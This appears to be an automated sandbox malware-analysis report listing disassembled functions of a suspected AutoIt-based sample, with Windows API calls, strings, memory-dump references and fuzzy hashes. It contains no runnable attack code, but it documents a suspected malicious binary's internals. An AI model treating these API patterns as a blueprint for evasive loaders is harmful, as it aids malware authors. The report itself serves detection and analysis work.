                                            Function 00E113B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                            Download Yara Rule
                                            APIs
                                            • EndPath.GDI32(?), ref: 00E113BF
                                            • StrokeAndFillPath.GDI32(?,?,00E4BAD8,00000000,?), ref: 00E113DB
                                            • SelectObject.GDI32(?,00000000), ref: 00E113EE
                                            • DeleteObject.GDI32 ref: 00E11401
                                            • StrokePath.GDI32(?), ref: 00E1141C
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                            • String ID:
                                            • API String ID: 2625713937-0
                                            • Opcode ID: 9e2cfc0a2e88a0b1b5d35e01fdc24cae71d154688cc596695395432fcba95720
                                            • Instruction ID: ad0a02ed36bcd50fa503340e18d2ad3ba5d3573b4120a66faae990d4668d7336
                                            • Opcode Fuzzy Hash: 9e2cfc0a2e88a0b1b5d35e01fdc24cae71d154688cc596695395432fcba95720
                                            • Instruction Fuzzy Hash: 0BF0C934006308EFDB195F67FC0D7983BA8E701726F149267E529A50F1C73159A9EF50
                                            Function 00E7C602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CoInitialize.OLE32(00000000), ref: 00E7C69D
                                            • CoCreateInstance.OLE32(00EA2D6C,00000000,00000001,00EA2BDC,?), ref: 00E7C6B5
                                              • Part of subcall function 00E17F41: _memmove.LIBCMT ref: 00E17F82
                                            • CoUninitialize.OLE32 ref: 00E7C922
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CreateInitializeInstanceUninitialize_memmove
                                            • String ID: .lnk
                                            • API String ID: 2683427295-24824748
                                            • Opcode ID: a4b7b0fcd93df21134f2e7b1536bf12866fdbce9cf44ee253a2a47fc7bae56b9
                                            • Instruction ID: 5c7cd7df8e5fb53d7dc624a379085fdb54d9ce293ccc5d93d39786bd24b909e1
                                            • Opcode Fuzzy Hash: a4b7b0fcd93df21134f2e7b1536bf12866fdbce9cf44ee253a2a47fc7bae56b9
                                            • Instruction Fuzzy Hash: 72A11D71208305AFD700EF64C891EABB7ECEF98704F00595DF196A7192DB71EA89CB52
                                            Function 00E22E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E30FF6: std::exception::exception.LIBCMT ref: 00E3102C
                                              • Part of subcall function 00E30FF6: __CxxThrowException@8.LIBCMT ref: 00E31041
                                              • Part of subcall function 00E17F41: _memmove.LIBCMT ref: 00E17F82
                                              • Part of subcall function 00E17BB1: _memmove.LIBCMT ref: 00E17C0B
                                            • __swprintf.LIBCMT ref: 00E2302D
                                            Strings
                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00E22EC6
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                            • API String ID: 1943609520-557222456
                                            • Opcode ID: e515429e6c458fda1ca9d4a49c37321eeae24644c7628412004f69e26b6a51f3
                                            • Instruction ID: 608bc03c51c3f4b2f05fa7a4c8e688b61a7ecfde0625b4b68fc8be92fa858e0e
                                            • Opcode Fuzzy Hash: e515429e6c458fda1ca9d4a49c37321eeae24644c7628412004f69e26b6a51f3
                                            • Instruction Fuzzy Hash: 84917F716083119FC718EF24D895CAEB7F5EF85740F00291DF886A72A1DB20EE84CB62
                                            Function 00E7BBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E148AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E148A1,?,?,00E137C0,?), ref: 00E148CE
                                            • CoInitialize.OLE32(00000000), ref: 00E7BC26
                                            • CoCreateInstance.OLE32(00EA2D6C,00000000,00000001,00EA2BDC,?), ref: 00E7BC3F
                                            • CoUninitialize.OLE32 ref: 00E7BC5C
                                              • Part of subcall function 00E19997: __itow.LIBCMT ref: 00E199C2
                                              • Part of subcall function 00E19997: __swprintf.LIBCMT ref: 00E19A0C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                            • String ID: .lnk
                                            • API String ID: 2126378814-24824748
                                            • Opcode ID: a0006f3bd99daf392cd4e6a8b86227f9a665701733ddc51fdc992f0457914e23
                                            • Instruction ID: 1af9b24efeeceb874705bfc9d45da3782900974cbe637251b933edc50fde93b3
                                            • Opcode Fuzzy Hash: a0006f3bd99daf392cd4e6a8b86227f9a665701733ddc51fdc992f0457914e23
                                            • Instruction Fuzzy Hash: 87A179712043019FCB14DF14C494E9ABBE5FF88318F149988F89AAB3A2CB31ED45CB91
                                            Function 00E6B7B6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                                            Download Yara Rule
                                            APIs
                                            • OleSetContainedObject.OLE32(?,00000001), ref: 00E6B981
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ContainedObject
                                            • String ID: AutoIt3GUI$Container$%
                                            • API String ID: 3565006973-1286912533
                                            • Opcode ID: 020fba365fa5775938318e5b1f2563a21bdd3add0389a17afb0535a72bb5df25
                                            • Instruction ID: 5db66a518edcbd79cfd0d8462db8cee03558df6a410b19efc8d4f9e95655df7a
                                            • Opcode Fuzzy Hash: 020fba365fa5775938318e5b1f2563a21bdd3add0389a17afb0535a72bb5df25
                                            • Instruction Fuzzy Hash: 70916A706402019FDB24CF68D885B6ABBF8FF48750F14956EF94AEB291DB71E881CB50
                                            Function 00E3524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                            Download Yara Rule
                                            APIs
                                            • __startOneArgErrorHandling.LIBCMT ref: 00E352DD
                                              • Part of subcall function 00E40340: __87except.LIBCMT ref: 00E4037B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ErrorHandling__87except__start
                                            • String ID: pow
                                            • API String ID: 2905807303-2276729525
                                            • Opcode ID: 2ae1d2f360180d961b322be8f5c7353b8047a2f26d0e88796a9d9a105add2305
                                            • Instruction ID: 024e6d107c70f0f85c30b4d993ee0a8bf9c7a92ec093204e0f5b2ab60a7e1bc7
                                            • Opcode Fuzzy Hash: 2ae1d2f360180d961b322be8f5c7353b8047a2f26d0e88796a9d9a105add2305
                                            • Instruction Fuzzy Hash: 4D516A32A0D6018BC711BB15E9053BA6FE09B40754F206D78E6E5723EAEE748DC8DA42
                                            Function 00E3023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: #$+
                                            • API String ID: 0-2552117581
                                            • Opcode ID: d80d57414959b5d70d205ee83bf1de0e4dda5a9ecb847ead4617d83002296778
                                            • Instruction ID: 42bad8cb80f9f4f44fcef4af3e152e4cc2094fb6537e57d1fb29142598bc9133
                                            • Opcode Fuzzy Hash: d80d57414959b5d70d205ee83bf1de0e4dda5a9ecb847ead4617d83002296778
                                            • Instruction Fuzzy Hash: 4F513176244246CFDF15DF28D898AFB7BA4EF16314F182056E891BB2E1C7309C86CB60
                                            Function 00E23297 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memmove$_free
                                            • String ID: Oa
                                            • API String ID: 2620147621-3945284152
                                            • Opcode ID: 43273f973ccc00973a977b65c0e7271bcd42cef909f5b04910f0f0fc9ea59cd2
                                            • Instruction ID: ceae39235e464b269c52a7254c92ee9b379247d963e45442b94556fc2e8f1e2d
                                            • Opcode Fuzzy Hash: 43273f973ccc00973a977b65c0e7271bcd42cef909f5b04910f0f0fc9ea59cd2
                                            • Instruction Fuzzy Hash: 7B5179B16083519FDB24CF28E451B2BBBE5BF85304F04592DE889A7361DB35E941CF82
                                            Function 00E262F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memset$_memmove
                                            • String ID: ERCP
                                            • API String ID: 2532777613-1384759551
                                            • Opcode ID: a0b3b95d38bf8cea5fcfa7880506d2715b2028a5fc9bfe102d2ffdce76e05268
                                            • Instruction ID: af6e78d99031c1f02bf24c4d49f1b6a39ea63614433b1791896d278e24e15009
                                            • Opcode Fuzzy Hash: a0b3b95d38bf8cea5fcfa7880506d2715b2028a5fc9bfe102d2ffdce76e05268
                                            • Instruction Fuzzy Hash: A951F3719003198BCB24CF64D881BAABBF4FF44318F20566EE59AEB241E7719680CB80
                                            Function 00E97648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00E976D0
                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00E976E4
                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E97708
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window
                                            • String ID: SysMonthCal32
                                            • API String ID: 2326795674-1439706946
                                            • Opcode ID: 4eac1b11039f3ddb366229d0e5feb31e0244fbab7582679dedd3975f34619dfa
                                            • Instruction ID: 41ace0952ae5c06fb88d0dbdaa7130a3a395f2edc973d01f3889d000b7bd4d08
                                            • Opcode Fuzzy Hash: 4eac1b11039f3ddb366229d0e5feb31e0244fbab7582679dedd3975f34619dfa
                                            • Instruction Fuzzy Hash: FB21F132510218BFDF11CFA4CC42FEA3BA9EF48714F101215FE55BB1D1D6B1A8548BA0
                                            Function 00E96F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00E96FAA
                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00E96FBA
                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00E96FDF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend$MoveWindow
                                            • String ID: Listbox
                                            • API String ID: 3315199576-2633736733
                                            • Opcode ID: c41371c8cfe478b2ecf04cb03cd788e35d2bd764b947ee33ff2526fea127521e
                                            • Instruction ID: 4908ca1784eb1ccfed7263cdefe4be3748f70c53ad7a2f31bf5f139d29e7822c
                                            • Opcode Fuzzy Hash: c41371c8cfe478b2ecf04cb03cd788e35d2bd764b947ee33ff2526fea127521e
                                            • Instruction Fuzzy Hash: 72219232710118BFDF118F54EC85FEB37AAEF89754F019126F914AB190C671AC518BA0
                                            Function 00E9797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00E979E1
                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00E979F6
                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00E97A03
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID: msctls_trackbar32
                                            • API String ID: 3850602802-1010561917
                                            • Opcode ID: 8736453e1b3afe166d79d3e34b2d7b75cc503dde3fbd7aee48cc99876cd12da8
                                            • Instruction ID: d3443b9d426e79b329169c4510f6dbe0f62821039418b698954453dfe88b12a7
                                            • Opcode Fuzzy Hash: 8736453e1b3afe166d79d3e34b2d7b75cc503dde3fbd7aee48cc99876cd12da8
                                            • Instruction Fuzzy Hash: D911E372254208BFEF249F65CC05FEB37A9EF89768F021519FA41B6090D2729851CB60
                                            Function 00E14C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00E14C2E), ref: 00E14CA3
                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E14CB5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                            • API String ID: 2574300362-192647395
                                            • Opcode ID: 4abfe85fee0daf9fb1454f6a36afc20ce1418dd16e2657cc7d1019959f957fd7
                                            • Instruction ID: 34934d0f5a2ae671e8c8d33e509a130e0d1e647b7d86e3b65ba76251747f3a7d
                                            • Opcode Fuzzy Hash: 4abfe85fee0daf9fb1454f6a36afc20ce1418dd16e2657cc7d1019959f957fd7
                                            • Instruction Fuzzy Hash: D6D01270511723DFDB205F32D918646B6D5AF05795B25983BD885F6290E670D4C0CA90
                                            Function 00E14D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00E14CE1,?), ref: 00E14DA2
                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E14DB4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                            • API String ID: 2574300362-1355242751
                                            • Opcode ID: df53adef903acf3793f38b73d4a0eb5741b0d9a0e9031f592dc3eb04d8ba8c7a
                                            • Instruction ID: d45cfad63f097df15c075a1ccd1fb1994a6b82d4cdf5ba8a1859a36841c0721e
                                            • Opcode Fuzzy Hash: df53adef903acf3793f38b73d4a0eb5741b0d9a0e9031f592dc3eb04d8ba8c7a
                                            • Instruction Fuzzy Hash: BCD01771650713DFDB209F32E809A8676E4AF06359B11983FD8C6F62A0E770D8C0CA91
                                            Function 00E14D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00E14D2E,?,00E14F4F,?,00ED62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E14D6F
                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E14D81
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                            • API String ID: 2574300362-3689287502
                                            • Opcode ID: 913bd5e38cf27f4a4dd43e57ccb9b7dc4da16ac7738a1cd50a05b9950dbac955
                                            • Instruction ID: 5970c2307b0a442ad31b158886e1b6c72662c04c5da57be46ba90619c9de660c
                                            • Opcode Fuzzy Hash: 913bd5e38cf27f4a4dd43e57ccb9b7dc4da16ac7738a1cd50a05b9950dbac955
                                            • Instruction Fuzzy Hash: 92D01770610713DFDB209F32E80965676E8AF15356B21983FD496F62A0E670D8C0CB91
                                            Function 00E91072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,00E912C1), ref: 00E91080
                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00E91092
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                            • API String ID: 2574300362-4033151799
                                            • Opcode ID: a8287536e76361b0ec48fb3a54fae34d9d1878fd53be8c76d53e55ed3c24d484
                                            • Instruction ID: 033cc55378c3008c447c87c2eb601db523549869fc2c6e9beb4647095a41fcd6
                                            • Opcode Fuzzy Hash: a8287536e76361b0ec48fb3a54fae34d9d1878fd53be8c76d53e55ed3c24d484
                                            • Instruction Fuzzy Hash: 79D0E230510713DFDB209B36E919A1A76E8AF05366B11986EE48AEA260E771C8C08A90
                                            Function 00E893F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00E89009,?,00E9F910), ref: 00E89403
                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00E89415
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
